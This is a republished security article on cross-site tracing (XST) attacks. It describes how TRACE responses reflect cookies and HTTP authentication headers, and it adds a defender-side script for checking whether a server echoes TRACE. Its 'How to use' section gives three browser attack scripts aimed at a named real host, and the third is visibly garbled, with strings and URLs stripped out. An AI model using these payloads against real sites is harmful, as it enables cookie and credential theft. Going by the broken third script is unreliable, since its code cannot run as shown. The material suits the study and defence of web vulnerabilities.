SoFunction
Updated on 2025-04-08

Cross-site tracing (XST) attack

Note: This article was published in the 8th issue of Hacker Defense, which holds the copyright.

XST attack description:
The attacker embeds malicious code in a web file on a host they control. When a visitor browses that file, the malicious code runs in the browser and sends a TRACE request to the target host. Because a TRACE response echoes the request back, headers included, the code can read the visitor's cookies and the HTTP Basic and NTLM authentication information for that host and send them to the attacker-controlled host, resulting in cookie spoofing or a man-in-the-middle attack.

XST attack conditions:
1. The target web server must allow the TRACE method;
2. There must be a place to insert the XST code;
3. The target site has a cross-domain vulnerability.
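
A defender-side check for condition 1, as an added example that is not part of the original article: it classifies the raw response a server you operate returns to a TRACE probe and reports which credential headers it reflected. The function names, the `X-Trace-Canary` header, the host `app.example.test` and all sample responses are constructed for illustration.

```javascript
// Added example: classify a raw HTTP response to a TRACE probe.
// Header name X-Trace-Canary and all sample data below are constructed.
const CREDENTIAL_HEADERS = ["cookie", "authorization"];

// Build the probe request text; the canary is a harmless random marker.
function buildTraceProbe(host, path, canary) {
  return [`TRACE ${path} HTTP/1.1`, `Host: ${host}`,
          `X-Trace-Canary: ${canary}`, "Connection: close", "", ""].join("\r\n");
}

// Split a raw response into its status code and body.
function parseResponse(raw) {
  const cut = raw.indexOf("\r\n\r\n");
  const head = cut === -1 ? raw : raw.slice(0, cut);
  const body = cut === -1 ? "" : raw.slice(cut + 4);
  const m = /^HTTP\/\d\.\d (\d{3})/.exec(head);
  return { status: m ? Number(m[1]) : 0, body };
}

// TRACE counts as enabled only if the server answers 200 AND echoes the
// canary; a 200 that serves an ordinary page is not a reflection.
function assessTrace(raw, canary) {
  const { status, body } = parseResponse(raw);
  const traceEnabled = status === 200 && body.includes(canary);
  const reflected = !traceEnabled ? [] : body.split("\r\n")
    .map((line) => line.split(":")[0].trim().toLowerCase())
    .filter((name) => CREDENTIAL_HEADERS.includes(name));
  return { status, traceEnabled, reflected };
}

// Constructed samples: a reflecting server (the client had attached
// credentials), a server that refuses TRACE, and one that ignores the method.
const CANARY = "c4n4ry-7f3a";
const probe = buildTraceProbe("app.example.test", "/", CANARY);
const ECHOING = "HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n\r\n" +
  probe.replace("Connection: close",
    "Cookie: sid=constructed\r\nAuthorization: Basic Y29uc3Q6cnVjdGVk");
const REFUSING = "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n\r\n";
const IGNORING = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>home</html>";

for (const [name, raw] of [["echoing", ECHOING], ["refusing", REFUSING],
                           ["ignoring", IGNORING]]) {
  console.log(name, JSON.stringify(assessTrace(raw, CANARY)));
}
```

A `traceEnabled: true` result from a server you operate means condition 1 holds there; on Apache httpd the method is turned off with `TraceEnable off`.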

Comparison between XST and XSS:
Similarities: Both are highly deceptive and can harm the victim host. Both are also multi-platform, multi-technology attacks: ActiveX controls, Flash, Java, etc. can also be used to carry out XST and XSS attacks.
Advantages: XST can bypass ordinary HTTP authentication and NTLM authentication.

How to use:

Method 1:

<SCRIPT type=text/javascript>
<!--
function xssTRACE(){
    var xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
    xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);
    xmlHttp.send();
    xmlDoc=xmlHttp.responseText;
    alert(xmlDoc);
}

//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value="XSS TRACE">

Method 2:

<SCRIPT type=text/javascript>
<!--
function xssTRACE() {
    var openWin=open("blank.htm","swords","width=500,height=400");
    var otraceswords=openWin.external;
    openWin.location.href="http://wmjie.51.net/swords/";
    setTimeout(
        function () {
            //The following must be written in one line
            otraceswords.NavigateAndFind('javascript:xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert("Do not use document cookies to display the header information of the site wmjie.51.net/swords/.\\n" + xmlDoc);',"","");
        },
        1024
    );
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value="XSS TRACE">

Method 3:

<SCRIPT type=text/javascript>
function xssTRACE(){
    var swords = "var xmlHttp = new ActiveXObject(\"\")\;(\"TRACE\",\"http:///\",false)\;()\;xmlDoc=\;alert(xmlDoc)\;";
    var target = "http://wmjie./swords/";
    spinach = encodeURIComponent(swords + ';()');
    var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + spinach + '")))';
    showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value="XSS TRACE">

Postscript: This is still at the research stage. I hope it attracts attention, and I hope to exchange experiences with you.